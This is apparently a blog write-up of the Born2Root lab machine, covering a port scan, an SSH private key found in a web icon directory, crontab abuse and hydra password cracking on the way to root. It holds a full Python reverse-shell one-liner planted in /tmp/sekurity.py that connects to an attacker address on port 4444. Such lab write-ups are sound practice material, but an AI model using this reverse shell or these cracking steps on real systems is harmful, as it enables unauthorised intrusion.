PGP: Born2Root

彤彤学安全
125 阅读1分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路

Generally , This target seems really easy . It is like a personal PC pentest but unfortunately I had never to think about how to attack a personal PC . And the author likes set rabbit hole very much .

Scan

It opened three ports 22,80,111

image-20220515103050558.png

Without 111 , it might be finding secret in web and logged in from ssh .

80 port

image-20220515103250081.png

The web index showed me three names . They were probably the users of the machine .

Dirsearch gave me some file directory . The robots was rabbit hole

image-20220515103525420.png

Open the icon dir . You will saw a suspicious file between many of icons named VDSoyouAXio.txt.

image-20220515104053198.png

This was a SSH private key.

Shell as Martin

Combined with Scan , I had three name Martin,hadi and jimmy. And I also had a ssh private key . So I tried to log in .

How to log ssh with key
1. copy key to text file
2. change privilge of the file 
    chmod 600 key.rsa
3.log 
    ssh martin@192.168.61.49 -i id.rsa

image-20220515105559964.png

After log it showed I had to key password . It just a joke .

Shell as jimmy

Checking the crontab .I found jimmy would run /tmp/sekurity.py per 5 minute .

image-20220516093842857.png

However when I moved to tmp . I didn't find this file . So I used vi to create this file to let jimmy reversing a shell to my kali.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.8",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

And then open nc , I got jimmy‘s shell . But there was nothing it can do .

image-20220516094232014.png

Shell as hadi

I tried to find any cues to get a root shell . But nothing was found . So I turned to crack hadi's password .I used hydra to do it . And just finding it's password was hadi123

image-20220516095150880.png

It is the first user of this PC.

Privilege Escalation to Root

I did many thing to try to get a root shell . And I did this target for 2 days . Until the second day , I thought shell I have a try to log to root by using hadi123 .

image-20220516095855443.png

I think maybe I use a way easy .

image-20220516100259490.png

...... I don't know what is the meaning of the steps I did above .

If craking the hadi at first . You just need 5 minute to get this machine .

avatar
文章
阅读
粉丝